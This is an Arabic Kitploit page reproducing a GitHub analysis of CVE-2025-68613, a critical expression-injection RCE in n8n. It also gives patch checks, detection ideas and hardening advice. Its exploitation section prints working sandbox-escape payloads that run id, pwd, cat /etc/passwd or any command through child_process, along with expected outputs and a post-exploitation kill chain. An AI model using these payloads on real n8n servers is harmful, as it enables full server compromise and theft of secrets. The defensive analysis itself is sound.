Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-68613-n8n-rce-analysis — CVE-2025-68613 (n8n) تحليل ثغرة RCE حرجة + توصيات دفاعية (التحقق من التصحيح، أفكار الكشف، ونصائح التعزيز) | Kitploit
أدوات/GitHubGitHub/ak-cybe/cve-2025-68613-n8n-rce-analysis
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالاستجابة للحوادث
GitHubak-cybe/cve-2025-68613-n8n-rce-analysis

CVE-2025-68613-n8n-rce-analysis

CVE-2025-68613 (n8n) تحليل ثغرة RCE حرجة + توصيات دفاعية (التحقق من التصحيح، أفكار الكشف، ونصائح التعزيز)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 7 أشهرلم تتم المراجعة بعد

لافتة رأس

SVG كتابة

الخطورة CVSS المثيلات المكشوفة الحالة CWE

GIF هاكر GIF الماتريكس


فاصل

📑 جدول المحتويات

  • 🎯 الملخص التنفيذي
  • 🐛 الثغرة
  • 🔬 التحليل التقني
  • 💀 دليل الاستغلال
  • 💥 تقييم التأثير
  • 🔍 الاكتشاف والاستجابة
  • 🛡️ استراتيجية التخفيف
  • 📚 المراجع

🎯 الملخص التنفيذي

GIF تنبيه

CVE-2025-68613 هي ثغرة حرجة لتنفيذ الأكواد عن بُعد في منصة أتمتة سير العمل n8n تسمح للمهاجمين المُوثَّقين بتنفيذ أوامر نظام تعسفية عبر حقن التعبيرات.


🐛 الثغرة

GIF خطأ

📋 نظرة عامة على CVE

🤖 ما هو n8n؟

n8n هي منصة أتمتة سير عمل مفتوحة المصدر تتيح التكامل بدون كود/بكود منخفض عبر أكثر من 400 تطبيق. يتم نشرها على نطاق واسع في:

🏢 حالة الاستخدام📝 الوصف

🔧 السبب الجذري التقني

root@kitploit:~
🔓 سلسلة الثغرة:
┌─────────────────────────────────────────────────────────────────┐
│  📝 لغة تعبيرات n8n → معالجة البيانات الديناميكية              │
│                           ↓                                     │
│  ⚠️  عزل غير كافٍ للصندوق الرملي في التقييم من جانب الخادم     │
│                           ↓                                     │
│  💀 هروب التعبير الخبيث من الصندوق الرملي                      │
│                           ↓                                     │
│  🖥️  الوصول إلى وحدة child_process في Node.js                  │
│                           ↓                                     │
│  💥 RCE كاملة - تنفيذ أوامر نظام التشغيل                       │
└─────────────────────────────────────────────────────────────────┘

🔬 التحليل التقني

GIF تحليل

🎯 سطح الهجوم

متطلبات الاستغلال:

#📋 المتطلب📝 التفاصيل
1️⃣المصادقةحساب مستخدم صالح في n8n (امتيازات منخفضة كافية)

⚔️ خصائص الهجوم

🏷️ السمة📊 القيمة🔥 الخطر
التعقيدمنخفض (AC:L)🔴 عالٍ
تفاعل المستخدم

🗺️ مخطط تدفق الثغرة

root@kitploit:~
graph TD
    A[🔐 مستخدم مُوثَّق] -->|ينشئ| B[📝 سير عمل جديد]
    B -->|يحقن| C[💀 تعبير خبيث]
    C -->|يطلق| D[⚡ تقييم التعبير]
    D -->|يستغل| E[🔓 هروب من الصندوق الرملي]
    E -->|يصل إلى| F[🖥️ بيئة تشغيل Node.js]
    F -->|ينفذ| G[💥 أمر نظام عبر child_process]
    G -->|يحقق| H[☠️ اختراق كامل للخادم]
    
    style A fill:#4CAF50,color:#fff
    style C fill:#ff9800,color:#fff
    style E fill:#f44336,color:#fff
    style H fill:#9c27b0,color:#fff

💀 دليل الاستغلال

GIF اختراق

⚠️ إخلاء مسؤولية: ما يلي لأغراض تعليمية فقط. الاستغلال غير المصرح به غير قانوني.

📸 لقطات خطوة بخطوة للاستغلال

🖥️ الخطوة 1: الوصول إلى مثيل n8n

الوصول الأولي إلى منصة أتمتة سير العمل n8n الضعيفة.

شاشة ترحيب n8n
🔓 لوحة تحكم ترحيب n8n - نقطة الدخول


➕ الخطوة 2: إنشاء سير عمل جديد

إنشاء سير عمل جديد سيحتوي على الحمولة الخبيثة.

إنشاء سير عمل جديد
📝 إنشاء سير عمل جديد مع "إضافة الخطوة الأولى"


⚡ الخطوة 3: إضافة مشغل يدوي

تكوين مشغل سير العمل - المشغل اليدوي يسمح بالتنفيذ عند الطلب.

إعداد المشغل اليدوي
🎯 اختيار المشغل اليدوي لتفعيل سير العمل


📦 الخطوة 4: إضافة عقدة Set

إضافة عقدة "تحرير الحقول (Set)" التي ستحتوي على التعبير الخبيث.

اختيار عقدة Set
🔧 إضافة عقدة "تحرير الحقول (Set)" لحقن الحمولة


💉 الخطوة 5: حقن حمولة RCE

الخطوة الحاسمة - حقن تعبير الهروب من الصندوق الرملي لتحقيق RCE.

تنفيذ حمولة RCE
💀 التعبير الخبيث ينفذ أمر 'id' بنجاح!

root@kitploit:~
// 🔴 حمولة خبيثة (لا تستخدمها بشكل غير قانوني)
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString(); })() }}

المخرجات تظهر: uid=1000(node) gid=1000(node) groups=1000(node) ✅ تم تأكيد RCE!


💉 أمثلة على الحمولات

GIF حقن كود

⚠️ تحذير: هذه الحمولات لاختبارات الأمان المصرح بها فقط. الاستخدام غير المصرح به غير قانوني!

🔹 أمر ID (معلومات المستخدم)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

🔹 أمر PWD (الدليل الحالي)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

🔹 قراءة ملف (/etc/passwd)

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('cat /etc/passwd').toString() })() }}

🔹 قالب أمر مخصص

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('أمرك_هنا').toString() })() }}

📸 إثبات المفهوم - استغلال قراءة الملف

استغلال قراءة ملف passwd
💀 قراءة /etc/passwd - تم إثبات الوصول الكامل إلى نظام الملفات!


📤 المخرجات المتوقعة


🔍 تحليل السبب الجذري

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────┐
│  🔴 السبب الجذري للثغرة                                                  │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  مُقيِّم التعبيرات في n8n يفتقر إلى أداة تنظيف تمنع تعبيرات الدوال      │
│  من الوصول إلى:                                                         │
│                                                                         │
│    ❌ this.process        → كائن عملية Node.js                          │
│    ❌ mainModule.require  → نظام تحميل الوحدات                          │
│    ❌ child_process       → تنفيذ أوامر نظام التشغيل                     │
│                                                                         │
│  هذا يسمح بالوصول المباشر إلى وحدات النظام وتنفيذ أكواد عشوائية!        │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

💀 ملخص التأثير

✅ التخفيف

الترقية

root@kitploit:~
# 🛡️ ترقية n8n إلى الإصدار المُصحَّح
npm install -g n8n@latest

# أو باستخدام Docker
docker pull n8n/n8n:1.122.0

🎬 سلسلة القتل الهجومية

☠️ إمكانيات ما بعد الاستغلال


💥 تقييم التأثير

GIF انفجار

🔺 تحليل ثلاثية CIA

🌍 التعرض في العالم الحقيقي

الضعيفة


🔍 الاكتشاف والاستجابة

GIF محقق

🔎 استراتيجيات الاكتشاف

🛠️ نصوص تدقيق الإصدار

root@kitploit:~
#!/usr/bin/env bash
# 🔍 CVE-2025-68613 تدقيق إصدار n8n

echo "🔍 جارٍ التحقق من إصدار n8n..."

if command -v n8n >/dev/null 2>&1; then
    VER="$(n8n --version | tr -d 'v' | head -n1)"
    
    if [[ "$VER" < "1.120.4" ]] && [[ "$VER" >= "0.211.0" ]]; then
        echo "⚠️  ضعيف: n8n $VER متأثر بـ CVE-2025-68613"
        echo "📦 مطلوب: الترقية إلى 1.120.4 أو 1.121.1 أو 1.122.0+"
        exit 2
    else
        echo "✅ آمن: n8n $VER مُصحَّح"
    fi
else
    echo "❌ n8n غير موجود في PATH"
fi

🚨 قائمة التحقق للاستجابة للحوادث

  • 🔌 العزل - فصل n8n المتأثر عن الشبكة
  • 💾 الحفظ - التقاط السجلات والأدلة الجنائية
  • 🔍 التدقيق - مراجعة جميع سير العمل بحثًا عن تعبيرات خبيثة
  • 🔄 التدوير - تغيير جميع بيانات الاعتماد القابلة للوصول
  • 🔀 المراجعة - التحقق من مؤشرات التحرك الجانبي
  • 📦 التصحيح - الترقية إلى إصدار آمن قبل الاستعادة

🛡️ استراتيجية التخفيف

GIF درع

⚡ الإجراءات الفورية (الأولوية 0)

🐳 مثال على تقوية الحاوية

root@kitploit:~
# 🛡️ نشر n8n مُقوَّى
FROM n8n/n8n:1.122.0

# 👤 التشغيل كمستخدم غير جذر
USER node

# 🔒 تطبيق علامات وقت التشغيل التالية:
# --read-only --tmpfs /tmp:rw,noexec,nosuid
# --cap-drop=ALL --cap-add=NET_BIND_SERVICE
# --security-opt seccomp=n8n-seccomp.json

🔐 الأمان طويل المدى

🛡️ الإجراء📝 التنفيذ
🌐 تجزئة الشبكةعزل مثيلات n8n
🔥 قواعد WAFمراقبة أنماط التعبيرات
📜 تسجيل التدقيق

💬 سؤال لفرق الأزرق 🔵

GIF تفكير

كيف ستصمم قاعدة كشف لتحديد محاولات حقن التعبيرات في تعريفات سير عمل n8n قبل التنفيذ، مع مراعاة الموازنة بين الأمان والاستخدام المشروع للتعبيرات الديناميكية؟

إضافي: ما هي حماية وقت التشغيل التي ستطبقها للحد من نطاق الانفجار إذا حدث الهروب من الصندوق الرملي رغم التصحيح؟


📚 المراجع

GIF كتب

📋 النشرات الرسمية

  • 🔗 تفاصيل NVD CVE-2025-68613
  • 🔗 نشرة Snyk الأمنية

🔬 التحليل التقني

  • 📖 أوركا سكيوريتي: ثغرة RCE حرجة في n8n
  • 📖 ريزكيوريتي: غوص عميق في حقن التعبيرات
  • 📖 سكيورليير7: دليل استغلال RCE

🎮 موارد عملية

  • 🧪 تري هاك مي: مختبر CVE-2025-68613
  • 💀 ماسح PoC عام

🏷️ الوسوم

root@kitploit:~
#CVE-2025-68613 #n8n #RCE #Expression-Injection #Workflow-Automation 
#Sandbox-Escape #CWE-913 #Critical-Vulnerability #Pentesting #Blue-Team

تذييل

⚠️ إخلاء مسؤولية: هذا التحليل لأغراض تعليمية وأمنية دفاعية فقط.
الاستغلال غير المصرح به للثغرات غير قانوني.

المؤلف آخر تحديث

مشاهدات الملف الشخصي

تنزيل الأداة

⚡ إحصائيات سريعة

🔥 المقياس📊 القيمة
درجة CVSS9.9 / 10
المثيلات المكشوفة103,476+
تعقيد الهجوممنخفض
المصادقة المطلوبةنعم (امتيازات منخفضة)
تفاعل المستخدملا شيء

🎯 حقائق رئيسية

📌 الخاصية📝 القيمة
الإفصاح18 ديسمبر 2025
ناقل الهجومشبكة (AV:N)
النطاقمتغير
التأثيرCIA = عالٍ
نوع الاستغلالحقن التعبيرات
الخاصيةالقيمة
🆔 معرف CVECVE-2025-68613
📊 درجة CVSS9.9 (حرج) 🔴
🔗 ناقل CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
🏷️ CWECWE-913 (التحكم غير السليم في موارد الأكواد المدارة ديناميكيًا)
📦 الإصدارات المتأثرة0.211.0 → 1.120.3, 1.121.0
✅ الإصدارات المُصحَّحة1.120.4, 1.121.1, 1.122.0+
🔧 DevOpsخطوط أنابيب الأتمتة، تكاملات CI/CD
🛡️ عمليات الأمانسير عمل SOAR، الاستجابة للحوادث
💼 الأعمالأتمتة العمليات، سير عمل البيانات
📊 البياناتعمليات ETL، تكاملات API
2️⃣الأذوناتإمكانية إنشاء/تعديل سير العمل
3️⃣الوصول الشبكيالقدرة على الوصول إلى مثيل n8n
لا شيء مطلوب
🔴 عالٍ
النطاقمتغير🔴 حرج
🎯 الحمولة📋 المخرجات المتوقعة
iduid=1000(node) gid=1000(node) groups=1000(node)
pwd/app
cat /etc/passwdقائمة مستخدمي النظام كاملة (جذر، خفي، عقدة، إلخ)
envجميع متغيرات البيئة بما في ذلك الأسرار
ls -la /قائمة نظام الملفات الجذري
🎯 نوع التأثير📝 الوصف
💻 تنفيذ أوامر عشوائيةتشغيل أي أمر نظام
📂 الوصول إلى نظام الملفاتقراءة/كتابة أي ملف
🔑 كشف متغيرات البيئةتسريب مفاتيح API وأسرار
☠️ اختراق كامل للنظامالسيطرة الكاملة على الخادم
🛡️ الخطورة📊 التقييم
درجة CVSS9.9 / 10
تعقيد الهجوممنخفض
الامتيازات المطلوبةمنخفضة
تفاعل المستخدملا شيء
المرحلة🔥 الإجراء💀 التأثير
1️⃣الوصول الأوليالمصادقة على n8n
2️⃣التنفيذإرسال سير عمل خبيث
3️⃣الاستمراريةنشر شل عكسية/باب خلفي
4️⃣C2إنشاء قيادة وتحكم
5️⃣الإجراءاتاستخراج البيانات، التحرك الجانبي
🎯 الإجراء💥 مستوى التأثير
🔑 سرقة بيانات الاعتماداستخراج مفاتيح API، رموز OAuth، كلمات مرور قواعد البيانات
📤 استخراج البياناتبيانات سير العمل، سجلات التنفيذ، معلومات الأعمال
🔒 الاستمراريةمهام cron، نصوص بدء التشغيل، شلات ويب
🔀 التحرك الجانبيالانتقال إلى قواعد البيانات، CI/CD، البنية التحتية السحابية
🗑️ التلاعب بسير العملتعديل/تدمير منطق الأتمتة

🔴 السرية (عالية)

  • 🔑 مفاتيح API مكشوفة
  • 🔐 رموز OAuth مسربة
  • 💾 كلمات مرور قواعد البيانات قابلة للوصول
  • 📜 سجلات التنفيذ مخترقة

🟠 السلامة (عالية)

  • 📝 سير العمل مُعدَّل
  • ⚙️ الأتمتة فاسدة
  • 💉 عُقد خبيثة محقونة
  • 📊 بيانات مُتلاعَب بها

🟡 التوفر (عالية)

  • ⏹️ خدمات معطلة
  • 💀 موارد مستنزفة
  • 🔄 سير العمل منتهٍ
  • 🖥️ بنية تحتية معطلة
#📋 الطريقة🔍 ما يجب مراقبته
📜تحليل السجلاتأوامر غير معتادة من عملية n8n، تعبيرات فاشلة
🌐الشبكةاتصالات صادرة لعناوين IP غير معروفة، طلبات POST كبيرة
⚡وقت التشغيلاستدعاءات child_process، إنشاء عمليات غير متوقع
📦تدقيق الإصدارالتحقق من نطاق الإصدارات الضعيفة
🔢 الأولوية🛠️ الإجراء📝 التفاصيل
🔴 P0التصحيح فورًاالترقية إلى 1.120.4 أو 1.121.1 أو 1.122.0+
🟠 P1تقييد الوصولقصر إنشاء سير العمل على المستخدمين الموثوقين
🟡 P2تقوية الحاويةالنشر مع قيود أمان
تمكين التسجيل الشامل
🔍 مراجعات الأمانتقييمات منتظمة لسير العمل
🔓 مبدأ الامتياز الأقلفرض ضوابط الوصول